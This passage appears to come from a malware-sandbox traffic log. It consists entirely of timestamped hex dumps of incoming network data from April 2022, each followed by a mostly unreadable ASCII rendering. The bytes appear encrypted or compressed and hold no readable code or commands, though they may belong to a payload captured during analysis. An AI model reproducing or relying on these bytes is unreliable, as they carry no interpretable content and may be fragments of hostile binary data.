                                                  Data Ascii: y{Q,m%G8[7;AnlBd~W9%>6j$5b(w.S',,em'`[uHQE4-E)|Io2ANfxx]7m1yOr8x%*EP?3;3+yWx^0qXO>lD'7p.
                                                  2022-04-23 06:15:05 UTC1191INData Raw: 15 d7 0d 57 78 7a b1 f7 a0 26 83 51 10 7f 39 18 4d 6b 09 d5 66 3d b3 78 b0 75 0a 77 75 1b e9 72 67 36 90 42 1f 1e 48 bc d4 83 da 38 57 59 bd 5a 98 0c 75 62 f6 44 a5 80 07 4a 07 99 f7 53 c9 a4 8c c7 a0 3c 25 2c 1f b6 3b 2f da 74 be 64 5f 62 9a f0 1c ae 79 5f d9 4a 0f e3 fd e0 6c 6b 80 a7 39 49 2b 2c 73 06 ab 3f 02 d2 d9 ea 34 a7 14 90 42 d2 ac 24 29 0d bf 27 ff c5 9d f1 5b 48 3c 07 7d 33 6b e8 90 40 77 8c 0a 43 4e 08 5e 1a 58 46 5e 7a dc 1f 04 a0 e5 f2 d3 7a 8a 55 a8 2f 8f fc 45 e9 45 2d 5f 65 78 f0 61 fb e4 a1 d8 4c 21 ca 3b c0 35 3b 3d ff 96 4b bd fa 94 2c 58 ed dd 73 fc 54 61 fb b0 2e ba 4a 39 c1 fa 03 05 4a e6 a6 0c 87 48 ae 3b 50 16 a4 8d 99 38 dd 52 5c cf 0d 89 56 b9 13 91 c3 2d cd 5b 33 8e 9b ef 67 88 47 3e fc 99 33 b3 ae 2d 99 51 32 d5 48 be a9 43
                                                  Data Ascii: Wxz&Q9Mkf=xuwurg6BH8WYZubDJS<%,;/td_by_Jlk9I+,s?4B$)'[H<}3k@wCN^XF^zzU/EE-_exaL!;5;=K,XsTa.J9JH;P8R\V-[3gG>3-Q2HC
                                                  2022-04-23 06:15:05 UTC1193INData Raw: c3 35 38 ec 0e e4 22 48 92 68 51 af ff b8 4f 6c 14 23 78 ac db 5e 4c 09 23 81 10 0b d2 75 5a 20 7f e0 80 8b cb 27 c8 ba 04 36 d2 11 43 d8 31 d4 ab ed a1 5d 48 df f4 b8 b1 ff 34 4a 53 99 1a 3e 1f 29 9f e8 86 19 00 9c d7 59 92 1a 83 71 01 0f bb 5d 6a 95 c8 e2 56 80 f2 2c c0 d6 c9 08 ee e0 8b 8a 3a e8 37 1b 30 6e 51 18 1a 9d 1c 25 1b 59 15 16 f7 b2 cd 04 9d 4f 84 4d 95 3b a7 b1 a7 91 12 6e 9e d0 fe a2 77 da e6 98 65 9f 26 bc f3 3b 2f da 0d 03 83 d1 f9 a7 fc a3 24 5c cd 70 37 4e bf ba c3 44 1f b3 37 96 53 44 16 7e fe 8c ef 14 8b 8d 3d 76 f9 57 8d 73 6b 2c 84 a5 f0 a0 ba fe 20 b5 9d f0 35 2c 78 14 76 70 2f 04 90 d4 74 cf a2 c6 3a d6 8d 55 98 9b 07 82 e1 0c 97 d9 7e c0 8b 4a c6 54 44 df 07 f7 e5 04 79 06 ec b2 e0 e7 c8 12 14 66 91 3b 90 b9 d2 fe 30 49 86 32 b0
                                                  Data Ascii: 58"HhQOl#x^L#uZ '6C1]H4JS>)Yq]jV,:70nQ%YOM;nwe&;/$\p7ND7SD~=vWsk, 5,xvp/t:U~JTDyf;0I2
                                                  2022-04-23 06:15:05 UTC1197INData Raw: 94 1f db ab f0 4d c1 fc 22 45 f6 c9 b0 cb 6c fe 48 23 29 56 b1 e8 11 5d 73 22 9e a5 4c 13 38 fe 26 96 1c f6 32 3b 0a cb 3c 5c 8f aa db bc 10 9b 20 40 da df 76 19 ee 75 ae 19 72 ae ce e2 ee 61 96 e6 b7 80 47 ca 0d a1 e7 dd 8b e4 fc 3b da 06 24 9c b4 85 5e 34 df d0 c7 85 01 96 69 5b db f2 d4 5c 54 96 91 9f 77 e5 e5 ec 7c 5e 5f 44 7c 2f 30 17 3a 88 d4 02 40 5b 67 8f 3d c3 5a 47 e4 b0 ab 9f 99 87 bf 7c d5 87 2f 86 5f e7 03 12 3b b0 49 6b 69 58 fc da 14 3f e5 1b 74 bb 8f 8c 53 53 31 c7 4a 8c d5 a6 c4 7d 90 cd 1a 4c d6 76 ab f4 e2 a7 97 fa bf 89 ee f4 a2 52 66 44 d6 53 a7 46 0a 4e 99 1a a3 3c 14 ae bf f7 ea d5 5c 9d c5 87 84 78 bb d3 cb de 0f 01 9e e5 53 e7 ca 99 17 fa 8f d8 8f a6 a0 e9 89 9f 5e 8e 1f 61 62 00 5f 27 c1 87 c8 44 35 38 ef bb 37 54 4c 7b 00 67 52
                                                  Data Ascii: M"ElH#)V]s"L8&2;<\ @vuraG;$^4i[\Tw|^_D|/0:@[g=ZG|/_;IkiX?tSS1J}LvRfDSFN<\xS^ab_'D587TL{gR
                                                  2022-04-23 06:15:05 UTC1201INData Raw: 07 1e e4 a8 20 ca 0f e1 72 8e 1f a2 a6 d6 d7 26 3a 93 52 98 88 c0 c7 89 4d 7a 62 a7 15 0f a0 fc b6 29 85 de 28 01 86 c5 f0 e2 c9 44 45 70 2b 1b 77 79 f1 8c 79 c7 59 76 fc 05 ae e4 e4 1f 5b 4e 47 33 e4 dd 47 44 39 15 09 e5 99 b1 dc 73 f2 f7 0f e5 3b 23 d8 ef 37 00 af 5b 46 bd 85 89 87 b2 86 57 59 aa 86 a2 52 99 79 cc c9 ec d8 55 31 c9 5f b8 8c e6 c4 81 25 1a 89 8d 47 24 d3 e4 91 c2 eb 60 26 35 7a ff ed e7 78 9b 4b 83 8d e9 18 a6 0d 27 89 93 d6 54 2f aa f3 4c b0 ab 8a fa 96 82 5b 31 d1 a3 3f 7e 73 69 07 86 b4 9a 29 1f 92 a9 2b d5 eb 9c ee 9b 1b 0b d7 ef e4 f4 46 10 06 65 72 47 64 99 8e 63 69 7d e6 87 01 a1 0c 73 c4 c1 09 be a5 fd 6e f1 27 3e 10 46 98 fa e0 16 96 5f 6f c8 73 e5 e6 6f 88 a5 64 0a ef 9f 74 bb 88 9e 4f c0 3b a0 21 0c e9 41 a5 6b 05 99 ed 2d d3
                                                  Data Ascii: r&:RMzb)(DEp+wyyYv[NG3GD9s;#7[FWYRyU1_%G$`&5zxK'T/L[1?~si)+FerGdci}sn'>F_osodtO;!Ak-
                                                  2022-04-23 06:15:05 UTC1202INData Raw: 08 ae e9 50 13 80 fb 67 63 ce 9a da 91 37 68 19 b6 56 aa a9 05 48 e9 ec bf e5 5f dd 65 69 1c e1 59 ee 96 60 3c c5 24 fd 0b 5f ac 79 15 00 c0 71 40 35 54 95 85 31 4b 82 37 d7 c4 85 48 5c b7 3d 5d 71 9f 9c 05 f4 26 d8 21 d0 1b 59 3d 91 7d 20 75 be 3f a2 02 e1 7c ad 3c 28 4d 44 f9 91 35 df 3b 7a b2 56 0f 63 bf ed 29 ee 7e 1a 9d 7a 28 ca c2 46 8b 74 24 03 aa 85 43 8c 26 25 87 42 67 18 a3 e2 66 ae 20 97 98 f1 b6 be e2 57 e5 32 3c 44 57 66 0f e1 e5 29 57 b2 73 b9 43 f6 16 64 fd c8 01 1b d1 fe ee 14 35 32 68 fb 4a 4f 82 38 20 7e 10 32 4f e3 72 27 b9 e5 3f 88 68 13 ed 56 b7 f5 15 90 b4 e8 12 54 34 c9 2d 83 68 3c ee 7b 7a 8e 71 b0 1a 6b a6 6f 1d 19 c6 18 2e 59 43 da 04 eb 70 df f7 c6 a4 a6 9f db 26 7e 08 66 b0 e5 cf d2 c2 b8 40 9d 46 33 49 dd cc 61 30 f7 cf 6a 2d
                                                  Data Ascii: Pgc7hVH_eiY`<$_yq@5T1K7H\=]q&!Y=} u?|<(MD5;zVc)~z(Ft$C&%Bgf W2<DWf)WsCd52hJO8 ~2Or'?hVT4-h<{zqko.YCp&~f@F3Ia0j-
                                                  2022-04-23 06:15:05 UTC1206INData Raw: 69 53 89 d6 db 8a 7c 8f c8 48 f6 18 ac 7d d1 8a 69 11 4a 3f f5 53 a9 c0 f5 47 ee 28 71 48 42 b8 b4 44 d2 66 4c ed b1 00 12 4b 6f fa 53 4a 3e 62 37 65 ac 06 95 7c bb a1 75 94 d0 81 7f 46 ff 7c dd 2e 8d b3 57 86 38 a1 ed da 6b e8 0d ac df 42 7b d4 41 57 79 1e bf 0f 14 84 74 24 79 30 c4 5e c6 6e db 2b fb f2 2f 36 a5 f6 90 7e b5 6d 49 e6 c2 4b c6 b0 c3 ff a2 f3 a5 a3 b6 12 71 2f 22 82 20 bb 27 1d 8f b5 bf d5 bf 82 6b 81 6b b3 a4 b7 96 7d f7 07 73 7c 8d 83 af fd 8d fb dd 4b 1c 38 d9 2f f0 82 15 4a 9f c4 85 b8 f0 73 d1 a2 0f 2d 8d cd 46 dd 20 19 b2 77 0c ab 1d df c9 a0 87 21 55 cd a8 93 cb c2 45 56 d9 84 51 98 27 23 1e 4c 84 eb c8 4b ce 86 99 74 48 67 79 7f 96 f8 d4 1d 26 7d f7 e2 26 76 08 88 c7 d5 81 4d af 10 9e 67 6b 65 ba 23 3d d7 c4 ed c7 0b cc 09 a7 d4 32
                                                  Data Ascii: iS|H}iJ?SG(qHBDfLKoSJ>b7e|uF|.W8kB{AWyt$y0^n+/6~mIKq/" 'kk}s|K8/Js-F w!UEVQ'#LKtHgy&}&vMgke#=2
                                                  2022-04-23 06:15:05 UTC1210INData Raw: 81 a2 a8 21 85 fe 71 ae a9 28 93 e7 75 e2 c4 5a f8 92 b1 c6 ee 09 47 0b 09 e2 c1 42 bb 10 7c 95 84 c0 43 19 09 1a ec 75 35 a6 3b 09 72 6e 12 6f 79 a8 78 e9 8d d5 ca ab 8c e6 b5 cd bd bb 8b c7 db 83 74 7b be 56 17 6c 8c ec 83 3c 46 a3 da 2e c2 3a 82 73 08 cf 51 96 04 b9 c6 10 b6 02 71 9a d5 93 80 65 a0 a9 94 9e 04 39 d6 04 ab f8 33 9e cc a6 ec d2 94 2a ba f8 43 68 60 5c 21 a4 de dd c2 51 da 74 db d1 86 9f 34 b7 11 64 0e aa 47 e2 95 9e 1e cb c0 63 2b a7 eb 3a 7e c8 1b e0 10 c4 41 af 99 b9 52 50 ae 84 1a f4 54 fe c2 d2 5e 63 7c 94 31 ca 18 70 c4 e9 38 8b c5 3a b6 61 e4 03 f9 e4 ba d9 5f 9e 05 83 5e 59 37 8c d7 83 60 e3 7d c0 70 a4 50 4b c1 2a f4 e0 ae 2e e0 14 39 c2 81 09 7e 32 c5 7e e9 72 ee a3 d1 18 6a 10 f9 ed 34 1c ae b1 2b dd 7d 74 c8 18 62 94 f8 13 f7
                                                  Data Ascii: !q(uZGB|Cu5;rnoyxt{Vl<F.:sQqe93*Ch`\!Qt4dGc+:~ARPT^c|1p8:a_^Y7`}pPK*.9~2~rj4+}tb
                                                  2022-04-23 06:15:05 UTC1214INData Raw: be 72 21 b5 a5 89 70 9c 7e e6 54 dc cc 50 a1 ff 97 37 33 9c c0 7f 17 d3 9d 56 0a 07 cf 0b f3 26 40 70 0c 47 19 f3 2e 65 6b 43 c3 14 b7 5a de 40 dc 0d 32 c1 7f 7d 5f b3 20 e1 c6 86 1e 6c fa 73 e1 6e 4d 46 8e 77 80 94 1c 1a 79 aa 05 9c ff e3 f1 4f e8 eb 37 2f 3b 85 5a ca 85 67 ef 61 13 f4 b0 24 da 4c 07 2b 19 8f 22 9b 97 35 3d df 99 a0 e4 a5 8e b7 51 06 36 a1 1a bb 6f 14 f0 e0 bd 0f bb cc 9d 19 e1 94 85 cf d1 75 46 79 61 99 5a 63 39 f9 00 d9 71 7c 9f 1f 38 fd 71 69 b0 24 95 76 9a e7 c7 0d 20 72 f0 99 5d e5 c3 c8 1f b0 b0 99 1c 75 d0 82 bd ce 9d ee 98 ed fe 6e 3d c5 9c a4 f9 e0 38 19 9f 7f ba 05 f8 4d f2 e6 ce 8d 64 19 da 92 af 94 4d a9 6d 3f e8 b4 5d 1f fa 74 4a 93 68 e7 e7 90 83 68 a9 14 32 d3 50 10 39 3c 2c 1d 7c 1f a3 aa 9b e8 40 5c 88 13 45 d4 1f d4 ad
                                                  Data Ascii: r!p~TP73V&@pG.ekCZ@2}_ lsnMFwyO7/;Zga$L+"5=Q6ouFyaZc9q|8qi$v r]un=8MdMm?]tJhh2P9<,|@\E
                                                  2022-04-23 06:15:05 UTC1218INData Raw: 7b a8 6c 91 08 92 6d c9 b2 42 2b c1 59 7d ad d8 97 9b 87 6d 11 b6 6e 19 7b b3 5e 5e b5 d3 98 66 9d 8e 1f 69 c7 21 8f bb 48 15 cb ed 5c 89 d6 d6 42 12 f3 fc 2b 7c 67 82 81 c4 8e 39 64 21 28 4a 75 84 80 a9 4b 86 eb a1 c5 8b 66 c4 83 0a 1e 66 3c fe 6b 80 5a a6 4d 97 8c a5 ca 3d 4e 8a 2b ad 86 dc d3 fa 35 b8 df cf b3 d7 8e 69 55 9b 80 75 56 71 a0 87 05 44 3c a8 2c f3 0b 37 c3 d3 41 6b e1 4f 95 67 5f 05 e0 cd 91 a6 63 1b 35 fc 67 c7 51 2b f3 c8 77 76 f0 bf 12 33 5e d6 23 4e 33 69 2b 9b 8b 09 cb 30 97 a6 c6 03 5b 75 8b 26 20 bd 50 43 b6 55 16 d8 9b c3 e7 01 47 70 0a 0a 3c 54 08 72 30 9b 8d 18 30 51 18 b3 e2 61 70 72 3a b6 99 3a b7 9b c9 8d 68 1e f9 cd 16 93 06 22 27 ab 9b 8f 13 f9 de b2 e6 0e fe 20 89 04 8e a8 96 e5 b1 dc 48 f3 db b3 3d f2 d0 ee 04 bc 40 c7 2b
                                                  Data Ascii: {lmB+Y}mn{^^fi!H\B+|g9d!(JuKff<kZM=N+5iUuVqD<,7AkOg_c5gQ+wv3^#N3i+0[u& PCUGp<Tr00Qapr::h"' H=@+
                                                  2022-04-23 06:15:05 UTC1222INData Raw: b9 b1 79 21 0b b4 0b 64 c9 58 ae 7c 50 1c 1e ee 67 f6 98 1b bc e7 8a 40 ad aa 6c ea a0 f1 85 48 8b f5 0f c8 8d 3e 55 69 b0 74 92 44 2e 85 1d 2d 6f d9 58 90 f5 d9 36 c9 c4 c1 80 a8 10 f0 db cc ef 3a 99 a1 35 a2 e3 8d b0 bb b8 ca 4c 74 24 82 e8 6f 57 50 d6 01 a3 53 42 3a c1 a6 8f c6 3f b7 53 e7 76 39 77 fe 9d ea dd 44 c9 92 a5 03 9c 39 92 dd 62 fa c6 6e b0 9e 2a c4 d5 6a 39 dc 90 bc d6 b9 78 dd 32 27 79 9f 28 fc 75 f5 47 27 ec e5 9a e9 7a 14 d1 23 15 93 48 be 2f 37 d6 65 20 67 9e 03 59 72 86 e7 e5 c9 0d 3a be b0 d3 42 92 5d 34 b6 bd ff 5c a8 af 32 12 6e af 72 cc 5d 80 98 a2 65 2e 95 aa ae ff 2c 19 75 d5 49 33 dd 1b 7b 9c ec c9 fe 75 84 f4 fc 73 c9 58 91 4f 65 7b 12 48 a6 ef ae 3c f0 ec 07 08 85 57 5f 3f d8 2f a7 8d 88 9d 94 c9 84 5d 5a 0d 06 47 81 fd 3e 00
                                                  Data Ascii: y!dX|Pg@lH>UitD.-oX6:5Lt$oWPSB:?Sv9wD9bn*j9x2'y(uG'z#H/7e gYr:B]4\2nr]e.,uI3{usXOe{H<W_?/]ZG>
                                                  2022-04-23 06:15:05 UTC1227INData Raw: ac 98 07 75 ea fc f8 f5 d2 da 93 45 75 65 df 1e f9 e5 cb fe 77 7e 91 30 68 de c1 65 ac 15 ad a9 10 a7 a0 5d b2 ba f4 71 5b b7 9c b8 3b b3 05 0a 10 ab f3 07 af 66 79 e5 ec 88 2a 77 ed 41 8c 42 dd a7 56 ce 5a 00 ec 83 ff 62 92 95 9a 10 63 c4 22 52 a3 8e c3 45 ac aa 76 5e 19 e6 94 86 5a 82 77 8a 43 a9 86 cd 57 e0 ae 14 cc b1 53 b8 9d f1 f5 79 40 17 04 c5 7a b6 51 7e 62 6f 29 74 fb 60 e6 4d 83 1e 92 0b af 57 d0 47 73 ff 97 74 69 cb 5d 2f 0d 70 5b 75 53 74 4f 5d 03 a8 65 6e 17 d4 a1 e6 74 ca 0b 16 58 1f a2 a2 1b 4b 1f af a5 4d be 00 fb e5 ff c5 3b 28 4e 99 80 64 e8 1c 52 61 95 ef 36 f1 65 5b 60 c5 9a 5b 18 a4 92 c8 fe 81 23 e4 3d 68 90 6f a3 9e ee 96 24 b9 d5 64 98 17 30 5b f5 87 f1 8e d2 be ce 7e 6e ab f0 26 b8 5c 48 99 64 84 c3 c1 00 8f c0 f0 c0 bc d9 ba 12
                                                  Data Ascii: uEuew~0he]q[;fy*wABVZbc"REv^ZwCWSy@zQ~bo)t`MWGsti]/p[uStO]entXKM;(NdRa6e[`[#=ho$d0[~n&\Hd
                                                  2022-04-23 06:15:05 UTC1231INData Raw: 9b fb 5d 2e ce 39 19 87 04 f7 6b 50 dd 31 69 29 d4 c2 eb e1 f0 91 20 07 ee e3 87 3e 96 6a c2 c8 a3 d4 18 26 80 56 5c 7c 18 ff 65 e3 bb 2b ba de 21 ef 28 d3 d6 f5 89 7b 87 f3 5c db 7f 75 df 51 1a 80 71 06 56 b3 13 93 56 aa 68 2a 55 0b 78 5e 21 70 e3 99 53 ab 7d 3d 53 8a da 1d d6 c2 06 33 69 91 18 9b 16 70 7e 06 73 b7 44 6c a1 5d 02 12 17 dc 3b e9 ef d5 23 06 67 5b 72 dc 7a 97 66 06 ec 59 f3 5c 1d e6 aa ca ee 60 14 d3 03 09 98 02 ee 72 75 0a 4e df 9c 19 c8 02 9c c4 f6 2c 6f 94 cc 8e fe bd 6e 20 86 22 a9 3b 3b 9b e7 76 c0 de 86 6c 51 a1 bd f3 3f f0 c4 76 44 dd 73 0a 1c 3d a1 e2 c5 04 4a db 92 5b cc e1 aa 39 05 9c 4e d4 3c e6 01 7c 54 da 42 e0 6b 69 e2 f8 84 af 3e 42 4d d1 a8 79 a9 db d4 72 cc 6d 39 2c ac 91 e4 6a dc 2c 19 01 ac ce 41 4c 24 5e 0a 89 8e 5b d4
                                                  Data Ascii: ].9kP1i) >j&V\|e+!({\uQqVVh*Ux^!pS}=S3ip~sDl];#g[rzfY\`ruN,on ";;vlQ?vDs=J[9N<|TBki>BMyrm9,j,AL$^[
                                                  2022-04-23 06:15:05 UTC1234INData Raw: c6 de bd c5 b3 d9 cc bf 52 49 ff 69 4b 3d c0 4f 85 d1 ce 9c eb 6d 2e 28 59 c3 27 16 40 82 33 54 05 a9 a2 55 7b a1 d8 05 cf 3e 45 e4 13 f2 7e 1c 0e 29 59 f4 f5 75 68 ae 21 c6 7f 2c b4 a3 40 c7 8d 02 73 d9 22 29 fd a2 79 ef 70 e8 9b cc 63 a7 62 6d de b1 de ae 30 9e 01 d8 2b 23 7f 36 2a 66 ac de 90 a2 17 44 52 39 2b 3b 4d 80 b5 53 e8 be 03 ec 91 7f e4 4c 1c a8 11 bf 44 a7 ee 9d dd ee 13 a2 72 5d 22 d3 7c 87 16 f0 ce 6a e9 f0 1d 69 8b 79 d1 45 89 4b 75 23 2e 5b ed 31 d7 a1 53 f4 41 c7 56 6b f4 f4 ef 3b 91 71 a1 9c 00 b8 50 de 4a b1 b3 f7 8b 9f a1 72 00 28 7f c4 97 45 1f 7e fb 89 8d 2a b1 e8 57 21 43 d0 7d ea c2 31 77 7e ec fd 45 22 bd 40 e8 63 ce 27 34 fc 2f c9 75 dc 1b 5c 0a 75 90 90 cc e3 5e f1 ae bf 7d bf b4 40 b7 da 89 27 9b 92 48 b5 6f 7e 20 20 f0 26 6d
                                                  Data Ascii: RIiK=Om.(Y'@3TU{>E~)Yuh!,@s")ypcbm0+#6*fDR9+;MSLDr]"|jiyEKu#.[1SAVk;qPJr(E~*W!C}1w~E"@c'4/u\u^}@'Ho~ &m
                                                  2022-04-23 06:15:05 UTC1238INData Raw: 61 bc 0a ae 25 4d 6c bf fd 30 d3 95 e9 e2 af 7c 47 a8 9b e9 5d 18 99 b3 d7 e1 7e de 2e b0 1d 35 e5 df a3 4f 89 9a 11 e1 2c 55 16 a3 1e e6 fc 1f 38 8c 16 d8 88 f7 19 67 2f 0a 2f 87 e6 52 67 64 d7 02 08 04 7c 98 9b 4f 57 4c 7a 49 be 49 e7 67 10 57 05 af 6a ce 5d 2b ac 9e f2 8a 94 dd 78 0b 73 9b a7 e8 15 41 22 07 9f c1 b8 d7 30 45 d4 77 89 70 c2 39 e6 08 3b 18 e1 27 e2 c9 d7 a3 c6 37 16 23 a9 47 14 04 2b 2d 4a 16 6f d5 d9 0e 01 6b fc bd a3 7c 6c 27 f3 8f c8 1a 30 71 2a fc 5a 24 d5 28 7d 48 09 f2 92 66 36 10 d0 88 05 06 c7 1c d6 df 41 21 9f bf 36 90 43 3d f3 4b bd 23 31 c6 f3 2f 76 39 43 eb 6b a1 25 37 bc c7 0c 8b ec ad f7 5a 7c bb 56 68 4d cc 39 af 35 32 fa 22 ad b0 ec c0 f3 80 23 44 e4 ff 77 07 84 00 2f 66 dc 76 d6 fe dc 45 18 32 09 7a 96 3d 2d 35 ea 57 89
                                                  Data Ascii: a%Ml0|G]~.5O,U8g//Rgd|OWLzIIgWj]+xsA"0Ewp9;'7#G+-Jok|l'0q*Z$(}Hf6A!6C=K#1/v9Ck%7Z|VhM952"#Dw/fvE2z=-5W
                                                  2022-04-23 06:15:05 UTC1242INData Raw: f5 cb ca f7 d3 dc 73 b7 0b d2 7d 50 04 f6 86 7f 29 b6 5f 9a 29 8d 7a e9 12 66 27 e6 8a c5 b1 fc e7 49 7b ab 5e 1f bc 87 72 4b a0 2c 65 b0 bb 53 96 b2 6f c6 9c 0e 43 64 fb 1b 4d f9 1a 43 ae b3 fa b4 48 f5 b7 74 e2 d8 7e f9 27 69 54 45 9c 1a 1c 82 9b 57 11 89 92 88 df 49 2e 1f 29 58 66 c9 58 97 0c 07 52 f1 fc e2 c1 78 80 58 6d 40 c3 76 c0 fd d1 74 31 74 09 b3 20 42 8f aa d8 be 9c a3 31 94 95 3b 89 55 8d ca 85 1b 7a 11 f8 b3 b5 01 53 e5 22 ba 84 f7 3c 35 d1 a1 dc ef ec 22 89 04 c0 75 36 4d 40 71 a1 f5 b8 c0 a8 d5 46 56 fd 1a c8 f6 c8 fa 40 5a b0 88 24 62 24 89 ff 98 96 29 33 a2 ef b1 88 0d 44 3d 81 4c dd de f3 ad be 42 21 d5 c8 63 bc 83 cd 27 76 a5 ec bb bb 81 3a 91 e1 60 cc 4a 24 e4 97 8b 5d d9 e3 7c 37 39 e7 7f a6 f7 21 f8 41 94 8c ec 15 e3 8a 57 3c 30 a6
                                                  Data Ascii: s}P)_)zf'I{^rK,eSoCdMCHt~'iTEWI.)XfXRxXm@vt1t B1;UzS"<5"u6M@qFV@Z$b$)3D=LB!c'v:`J$]|79!AW<0
                                                  2022-04-23 06:15:05 UTC1246INData Raw: 59 68 77 36 1a 7d 52 70 4a 52 7e 31 46 ca 33 89 f9 eb 93 83 a7 1a 44 da db 6c 1c a8 4f 37 bd f5 ae 44 f0 01 63 75 75 b6 71 bb c2 70 ee 0d 16 77 57 81 b3 9b 68 a9 2f 96 83 fb b0 68 73 f7 c9 3f 01 1f a6 37 8b b2 b2 7c 41 d1 83 58 28 aa 02 ee fd 83 03 25 f0 7f c4 8b 84 81 34 b1 d8 83 6c 0b e3 d7 78 63 a2 a4 76 43 64 5d 16 eb 79 2b 1d 32 ed 57 86 56 23 aa 65 68 91 2f e8 7b 73 e7 53 75 65 52 09 0c ad e4 8b f3 e1 a9 3c be 2e e3 09 5d 5c d1 3b 3f c4 e8 32 ab b9 99 1f 49 58 c6 33 b4 de 72 88 b3 c5 28 ee 46 64 07 b5 f5 c2 b7 80 57 45 3a df 7c da a7 af 39 e0 e5 f7 ce 85 75 61 8a 85 b1 be f5 b1 6e 86 a6 4d c3 29 90 f1 a9 32 75 58 41 cf 20 61 79 83 55 0f 81 48 90 85 41 bd 64 21 25 92 6e 58 f9 52 02 1a 56 52 ef 8b 2d 93 85 5f ab 0f 92 29 fd de 79 65 74 ed b9 2b 0b ef
                                                  Data Ascii: Yhw6}RpJR~1F3DlO7DcuuqpwWh/hs?7|AX(%4lxcvCd]y+2WV#eh/{sSueR<.]\;?2IX3r(FdWE:|9uanM)2uXA ayUHAd!%nXRVR-_)yet+
                                                  2022-04-23 06:15:05 UTC1250INData Raw: c0 76 e0 4c 28 6d 6e af 1d 1b 19 6e f4 bd 2e 29 6e 7e cd 1b b5 cb 4c 89 da 09 85 3f f8 26 9d 99 0d 0c dd 1b 55 24 8e 6f d3 cf 5b d3 1b 5a 20 50 9e 4a b8 7a 7c a9 a4 2c dd 64 68 0b 1c ce e8 39 4c 81 41 ce 1f 0c 03 08 7a a8 e4 0d 2a 2d 16 73 34 c5 ce 67 f9 bc 5d 4f 67 61 ac 3c b5 b7 4d 72 0f 34 69 2a f0 b8 5c 9e b9 57 da c9 d7 9f ad b2 4b 91 d3 7f ba e2 7b b7 e1 de a7 0b c7 4a ab 89 0d 78 c9 97 46 1e 97 e8 3e fa 2a 86 0c 99 be db 7c 8e f6 92 5a 3e 4d 68 fe 1d 72 ad 00 be 3f 59 96 34 2e c2 6f 3d 9a 4a 7c bb 67 9a 39 9a df fb 85 18 70 b4 48 fe bc 34 3e dc b5 bc 91 54 75 f0 ba a2 2f e9 ce e2 97 8f 65 45 b5 f5 d7 ed 10 30 6d 3a aa ae d8 46 b7 63 65 f7 c5 76 b3 93 f3 aa 05 42 ff 06 f3 bf 8f d0 34 65 4b ab fc be 78 18 b9 9d e9 cd 98 d7 4a e9 fb 7f c3 4a f9 ae 79
                                                  Data Ascii: vL(mnn.)n~L?&U$o[Z PJz|,dh9LAz*-s4g]Oga<Mr4i*\WK{JxF>*|Z>Mhr?Y4.o=J|g9pH4>Tu/eE0m:FcevB4eKxJJy
                                                  2022-04-23 06:15:05 UTC1254INData Raw: 12 7c c8 c9 4b 80 04 73 c1 c2 9a a3 da 6b 9c 7f d7 b4 46 40 f9 4e de f2 32 41 ab 2d af c8 5a 26 d6 b6 29 d6 0e 59 ed a4 11 43 b1 cf 84 e7 7c 9f 79 44 8e 1e b7 e3 db 80 3d 43 ee c8 d0 6b 34 e9 7f 7e b3 f0 35 9a dc 81 7c f1 56 d1 31 7e 6f 17 e8 d2 69 1b 8d 53 a5 5b 71 ea 2e bc 4b 03 5c 82 ec 8f 52 2f 98 43 c2 05 fc d4 95 90 81 34 b1 d2 9f db 20 d2 c8 1e f4 36 e4 05 86 31 a3 d8 9c bc df 73 85 6d d1 b4 24 24 ba 74 b6 07 95 e4 63 65 50 cc 03 7d 79 71 45 75 9c cc 8e bc d3 3b 64 c2 b9 1a 63 d2 5f fb e8 12 60 30 ad d8 96 a4 69 19 97 33 2e ab 29 c2 82 ad c7 d9 1e c7 d9 6b fb 4f 87 ee 60 a2 38 f6 92 ab 06 21 1d d7 21 87 75 ee 64 88 66 67 4a a0 f9 5f a9 76 72 bc 87 19 02 b7 a2 5e 51 e0 a9 bc 7f 25 a9 3b 5a 5a 97 51 28 58 f2 97 cb 14 ad fb 31 0f 61 12 14 cd cf fc 62
                                                  Data Ascii: |KskF@N2A-Z&)YC|yD=Ck4~5|V1~oiS[q.K\R/C4 61sm$$tceP}yqEu;dc_`0i3.)kO`8!!udfgJ_vr^Q%;ZZQ(X1ab
                                                  2022-04-23 06:15:05 UTC1259INData Raw: 77 60 15 ff da 5a b1 15 f2 fd 5d 81 72 e3 fb 85 a7 f5 a9 c5 22 bd 8d 20 32 dc 59 3d b1 03 ec 16 cc 4c 23 64 ca f8 c1 73 d9 ec 08 7f 74 ca ab 17 07 e8 a9 51 bf 4c 98 85 6b d4 69 31 64 ed e9 8b a2 dc 6d 72 b6 46 71 0f e3 aa 8c f6 07 05 00 df e5 52 e5 04 30 7b b6 56 a7 d9 ce e6 eb 28 9a 44 19 a3 5d c6 17 02 75 78 41 6b f2 7e 32 9e 8b a7 ce 6b 07 1b 8d 28 de d2 3f 50 d9 fc d5 a9 cd 02 27 18 bf e7 5a ca 1a be d9 ca 05 ea 31 93 b9 55 9a f7 00 eb 2f 5f 93 4c eb 46 df 38 b0 37 df ae ae 26 70 6c d7 11 4f 5a 2b 75 5d 3b 0f be 8a a8 2a f9 36 bf 18 94 10 65 b1 d3 f1 99 24 92 fd ad 34 40 fa 73 53 99 45 cb 1a 8e 5c 6a 5a 71 0d fd 8b d4 5e 88 f7 e3 9c 77 64 ba d0 e2 63 3f c4 7a f7 12 ad 7c 2d a0 b8 b6 65 57 c2 a3 51 c8 95 b7 f6 26 c4 72 e0 5e d8 ac e8 8a 0d 53 b4 b3 f5
                                                  Data Ascii: w`Z]r" 2Y=L#dstQLki1dmrFqR0{V(D]uxAk~2k(?P'Z1U/_LF87&plOZ+u];*6e$4@sSE\jZq^wdc?z|-eWQ&r^S
                                                  2022-04-23 06:15:05 UTC1263INData Raw: 5d 39 0f 55 d2 62 3f 23 aa a0 da 5a e8 3d 7a 2d 13 22 4c 65 75 0f 9f 70 f8 10 32 4f 1e 95 dd bc 30 6c 61 c8 41 d7 f7 1e 73 7f b3 50 7b 10 b7 88 e6 90 fe 2a 64 0b 96 ff 79 72 1d e8 42 3e 8a 21 6a 1d e3 7d 38 54 32 53 e8 df 42 52 34 10 4b 26 4b 29 2a 90 92 4f 3d e6 1f bb 7b 94 7d df 3e 63 b5 33 f3 b6 bd 96 70 1d 46 31 5f 94 88 b5 9e b7 f7 d7 1f ae d6 83 df 33 7c 4e 11 51 4f f9 cc 37 85 5e 6c 64 40 8a 00 da fa 4d 5c c2 43 ad db 1f ab bb bc d2 23 95 4e 70 3c 80 77 2e 0d 27 38 dc 70 2f d3 8d e5 94 83 dd 26 91 40 bc 41 01 6f 45 5f d4 ea 16 6c bd 4b f0 30 5b e8 0b ac a2 c6 02 89 d9 7d 